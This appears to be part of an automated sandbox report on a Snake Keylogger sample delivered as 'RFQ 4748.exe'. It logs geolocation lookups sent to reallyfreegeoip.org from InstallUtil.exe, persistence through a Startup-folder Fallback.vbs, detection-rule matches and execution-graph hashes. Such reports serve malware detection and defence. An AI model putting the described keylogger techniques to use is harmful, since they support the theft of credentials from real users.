                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SieYKRuvjfovu%2Fh9%2BUJRo12mH3INRmMj6hNWHU%2B7giyT00OkfwIeWkX3gc0ALBqcoMDn%2FxdOyaKc0VQO4Ekm%2FNYp1XhfiWRYi747sESOMlZE8ib%2Bqj1Tz33VA0KHmYGEm1dyfZ2d"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df50265cbf7eb16-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1152&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2630336&cwnd=251&unsent_bytes=0&cid=979dc5db004af3a5&ts=154&x=0"
                                                            2024-11-08 10:51:42 UTC | 146 | IN | Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
                                                            2024-11-08 10:51:42 UTC | 213 | IN | Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            14 | 192.168.2.5 | 49802 | 188.114.96.3 | 443 | 3652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-11-08 10:51:43 UTC | 63 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-11-08 10:51:44 UTC | 1223 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:44 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15819
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zMqVtx2rcgza2DWI9PzkzE2X0QSLi3KBWrDId2w%2F2GVfrFex8Y7w2%2BAaH%2FAXRYMVH34iY%2BB9lgtwEhHK3Y%2BdLQEdYub3gD7RcFMWOgfzJQSs3DiBi7xQhtwVAl0LvXTul%2BzRvW9k"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df5026fffd50b76-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1419&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1962059&cwnd=251&unsent_bytes=0&cid=640c7d3e63995c23&ts=147&x=0"
                                                            2024-11-08 10:51:44 UTC | 146 | IN | Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
                                                            2024-11-08 10:51:44 UTC | 213 | IN | Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            15 | 192.168.2.5 | 49814 | 188.114.96.3 | 443 | 3652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-11-08 10:51:45 UTC | 87 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:45 UTC | 1221 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:45 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15820
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dCH5huZt5WH8S7DKbsMOlzX09H5qkDojwwyZD%2BoZhGjnfPAppHDv0kz%2BE%2Fh1MxJGj6bo%2FHhbTp5id7C2JHjLiYP5fes4MEANetDG97mqkFz3KFupVzV9DujIZn%2B84AzhZNCQWVJl"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df50279fdc0e546-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1272&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2083453&cwnd=251&unsent_bytes=0&cid=095c384381b09629&ts=145&x=0"
                                                            2024-11-08 10:51:45 UTC | 148 | IN | Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
                                                            2024-11-08 10:51:45 UTC | 211 | IN | Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            16 | 192.168.2.5 | 49826 | 188.114.96.3 | 443 | 3652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-11-08 10:51:47 UTC | 87 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:47 UTC | 1221 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:47 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15822
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=THTcv7rKWk1YI9%2BNPZVCA0tQ%2FpohrMInrE64G15BQZ6zJYTgDwREaYWJOHi%2Bp9%2BJ0HXG8zu0v6xSRgctQaaktoc6G91NOUU%2Bp8LkXw3MHxKbHOlngFDazue47quFSAon5naPvced"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df502876c1c3aac-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1216&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2385502&cwnd=245&unsent_bytes=0&cid=2efd81741b7e909b&ts=153&x=0"
                                                            2024-11-08 10:51:47 UTC | 148 | IN | Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
                                                            2024-11-08 10:51:47 UTC | 211 | IN | Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            17 | 192.168.2.5 | 49842 | 188.114.96.3 | 443 | 3652 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-11-08 10:51:50 UTC | 87 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:50 UTC | 1219 | IN | HTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:50 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15825
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YSkuStCtjH%2FpUf5Fks39Q4hWQrmuPKQ1N3ChToSPOiVDDbnsdySvcUvX91I2G%2BBZrOH0lE6WoVHgyA0E1updG8F%2BnRQflLta70Lwi2SvyoqPYEqPEBgPohaIZ9H8Am%2FDPS2KgWyI"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df5029749e2462a-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1716&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2470989&cwnd=251&unsent_bytes=0&cid=ddaad42acda11760&ts=142&x=0"
                                                            2024-11-08 10:51:50 UTC | 150 | IN | Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
                                                            2024-11-08 10:51:50 UTC | 209 | IN | Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Target ID:0
                                                            Start time:05:51:08
                                                            Start date:08/11/2024
                                                            Path:C:\Users\user\Desktop\RFQ 4748.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\RFQ 4748.exe"
                                                            Imagebase:0xa40000
                                                            File size:97'280 bytes
                                                            MD5 hash:AD61C5C16181FE8CE8FE58AB4BF3D15D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2105383235.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2089151863.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:05:51:15
                                                            Start date:08/11/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                            Imagebase:0x8c0000
                                                            File size:42'064 bytes
                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4492614618.0000000000419000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4496477218.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4492614618.0000000000408000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4496477218.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            Target ID:4
                                                            Start time:05:51:27
                                                            Start date:08/11/2024
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs"
                                                            Imagebase:0x7ff69dd00000
                                                            File size:170'496 bytes
                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:05:51:28
                                                            Start date:08/11/2024
                                                            Path:C:\Users\user\AppData\Roaming\Fallback.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\Fallback.exe"
                                                            Imagebase:0xe40000
                                                            File size:97'280 bytes
                                                            MD5 hash:AD61C5C16181FE8CE8FE58AB4BF3D15D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2288151559.0000000003719000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2288151559.0000000003719000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.2288151559.0000000003719000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2303227720.000000000440D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2303227720.000000000440D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2288151559.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 32%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:05:51:34
                                                            Start date:08/11/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                            Imagebase:0x6c0000
                                                            File size:42'064 bytes
                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4492594683.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000002.4492594683.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4496144498.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4496144498.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false


                                                              Execution Graph

                                                              Execution Coverage:12%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:11%
                                                              Total number of Nodes:419
                                                              Total number of Limit Nodes:33
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                              • API String ID: 0-3443518476
                                                              • Opcode ID: 095c8af4a9153cfb185dc7bf8dbe022de8f6de743a00ab3813ef9c09f4037b98
                                                              • Instruction ID: 562aecc39d2a650c711ccbf6dc5a5aacd11fa7f87bcea8336f48285eabeb9973
                                                              • Opcode Fuzzy Hash: 095c8af4a9153cfb185dc7bf8dbe022de8f6de743a00ab3813ef9c09f4037b98
                                                              • Instruction Fuzzy Hash: F2B20834A00218CFDB54DFA9CC94AADB7B6FF88700F158599E905AB3A5CB70AD81CF54
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                              • API String ID: 0-324474496
                                                              • Opcode ID: bb446068b9a6a7ce6f2e222b53f3c3666b76919e9c2739aeabc4d6bce9b0cb21
                                                              • Instruction ID: 7f6d8000d784a1fa00f1a0141d2dcc1008ab1f9f8e3ae4db01a3ce583fa2dd07
                                                              • Opcode Fuzzy Hash: bb446068b9a6a7ce6f2e222b53f3c3666b76919e9c2739aeabc4d6bce9b0cb21
                                                              • Instruction Fuzzy Hash: 8522E874A00218CFDB54DF69CD94BA9B7B2FF88304F158199D90AAB3A5DB30AD81CF54

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088836982.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12d0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TJbq$Te]q$paq$xb`q
                                                              • API String ID: 0-4160082283
                                                              • Opcode ID: 1ed479fef71b9643a52b848b875f2c6b97891b9913bd3a584a5c6e6aeacc9541
                                                              • Instruction ID: c3d04900ed8c9ab4f622154dee8432fe1bb05c076282b51fc9aa59828353f41d
                                                              • Opcode Fuzzy Hash: 1ed479fef71b9643a52b848b875f2c6b97891b9913bd3a584a5c6e6aeacc9541
                                                              • Instruction Fuzzy Hash: B0A29375A10228CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB325DB319E81CF40

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105346700.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ae0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 2$$]q
                                                              • API String ID: 0-351713980
                                                              • Opcode ID: ef66c1c2c94cc3be1c84cf86c6e4055e4c1591f706b133756efbd0de0e02103f
                                                              • Instruction ID: c971cc046701b45819b58f78270136f11308135a4c29ab03749afc63650c9d1a
                                                              • Opcode Fuzzy Hash: ef66c1c2c94cc3be1c84cf86c6e4055e4c1591f706b133756efbd0de0e02103f
                                                              • Instruction Fuzzy Hash: 3DE2C578E01228CFCB64EF69D984B9AB7B6FB89301F1081EAD549A7354DB345E81CF50

                                                              APIs
                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06AD8809
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: MemoryProtectVirtual
                                                              • String ID: NnLH
                                                              • API String ID: 2706961497-1007542163
                                                              • Opcode ID: 831fd314cb6184471967d7dc3738be9e30c3d9c121a0ca5740486e23a4bd76ed
                                                              • Instruction ID: e07ee5e249b58d947cf4d7a6ff3beb96b886d4e6a5e3ff9711616bb7e1738b7d
                                                              • Opcode Fuzzy Hash: 831fd314cb6184471967d7dc3738be9e30c3d9c121a0ca5740486e23a4bd76ed
                                                              • Instruction Fuzzy Hash: A89109B4E01209DFCB44DFA9D980AEEBBF5FF49300F108469E50AAB354DB34A945CB90

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: fbq$8
                                                              • API String ID: 0-3186246319
                                                              • Opcode ID: 2b5c1f6764991538a8283a5ca3ef98f4960c3aa5ed37271fe50357cab3d2b9f8
                                                              • Instruction ID: 0b8d625892130f71b43d1fd4c2cdb9b10ed2f8edc5f103f0bc01ef6a431cf338
                                                              • Opcode Fuzzy Hash: 2b5c1f6764991538a8283a5ca3ef98f4960c3aa5ed37271fe50357cab3d2b9f8
                                                              • Instruction Fuzzy Hash: B862E775E002299FDB64EF69C894AD9B7B1FF89300F1082EAD549A7355DB30AE81CF50

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AQJ!$Te]q
                                                              • API String ID: 0-2361554527
                                                              • Opcode ID: 255c8cb141260b23f21fa8e1b6ef38e3871922c9ea90838489ee965b60071610
                                                              • Instruction ID: b7df14355f1d9283b1d4cd52f030b4c178c877e487851eacd6d6079ceb876200
                                                              • Opcode Fuzzy Hash: 255c8cb141260b23f21fa8e1b6ef38e3871922c9ea90838489ee965b60071610
                                                              • Instruction Fuzzy Hash: EB122874E06228CFEB94DF6AD884B99B7F2FB89300F1181A9D909A7344DB345D85CF45

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105658051.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6c50000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AQJ!$Te]q
                                                              • API String ID: 0-2361554527
                                                              • Opcode ID: 1077b89c01dc931cda5caedbfe0e93b78717d8717bdd9469aae339085f642382
                                                              • Instruction ID: 53c96de138282c6790c5dfc16af65e7174b701e60f83938a84368bc1c5665c7f
                                                              • Opcode Fuzzy Hash: 1077b89c01dc931cda5caedbfe0e93b78717d8717bdd9469aae339085f642382
                                                              • Instruction Fuzzy Hash: 56123974E05228CFDBA4DF6AD884B99B7F2FB89300F1181A9D909A7344DB345D85CF45
                                                              APIs
                                                              • NtResumeThread.NTDLL(?,?), ref: 06AD9C2E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2105308845.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ad0000_RFQ 4748.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: aabfd71ff3788f6cbfbb9477279e13297a0af48d423641bd4b403bb1c87fbf73
